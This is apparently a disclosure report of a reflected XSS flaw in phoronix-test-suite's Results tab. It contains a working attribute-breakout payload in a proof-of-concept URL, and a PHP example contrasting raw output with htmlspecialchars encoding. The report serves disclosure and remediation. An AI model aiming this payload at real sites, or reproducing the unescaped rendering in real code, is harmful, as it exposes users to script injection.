Reflected XSS in Results tab in phoronix-test-suite/phoronix-test-suite
Jun 8th 2022
Proof of Concept
1. Install a local instance of phoronix
2. Run a benchmark
3. When the test is complete, note the result id (for example, xxxxx)
4. Access http://localhost/?result/xxxxx&ppd_U1lTVEVN=abc"onfocus="alert(origin)"+autofocus="abc&oss=&submit=Refresh+Results

You will see an alert box.
This vulnerability allows reflected XSS.
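The shape of the parameter value in step 4 suggests it is reflected inside a double-quoted HTML attribute. The PHP below is an added example, not phoronix-test-suite code: it assumes that reflection context, uses hypothetical function names and a hypothetical `<input>` template, and shows the raw rendering beside one encoded with `htmlspecialchars`.

```php
<?php
// Added example, not phoronix-test-suite code.
// Assumption: the ppd_* value is echoed inside a double-quoted HTML attribute.

// Query string from the proof of concept (result id left as the page's xxxxx).
$query = 'result/xxxxx&ppd_U1lTVEVN=abc"onfocus="alert(origin)"+autofocus="abc'
       . '&oss=&submit=Refresh+Results';
parse_str($query, $params);            // URL-decodes: "+" becomes a space
$value = $params['ppd_U1lTVEVN'];

// Vulnerable pattern: raw concatenation into the attribute.
function render_raw(string $name, string $value): string
{
    return '<input name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode both quote styles for the attribute context.
function render_encoded(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    return '<input name="' . htmlspecialchars($name, $flags, 'UTF-8')
         . '" value="' . htmlspecialchars($value, $flags, 'UTF-8') . '">';
}

// Structural check: the template emits two quoted attributes, so a correctly
// rendered tag contains exactly four literal double quotes. Any more means the
// reflected value closed its attribute and started new ones.
function attribute_intact(string $tag): bool
{
    return substr_count($tag, '"') === 4;
}

$renderings = [
    'raw'     => render_raw('ppd_U1lTVEVN', $value),
    'encoded' => render_encoded('ppd_U1lTVEVN', $value),
];
foreach ($renderings as $label => $tag) {
    printf("%-8s %s\n         structure intact: %s\n",
           $label, $tag, attribute_intact($tag) ? 'yes' : 'no');
}
```

`htmlspecialchars` with `ENT_QUOTES` covers a quoted attribute value; it does not make a value safe in unquoted attributes, URLs or script blocks, which need their own encoding.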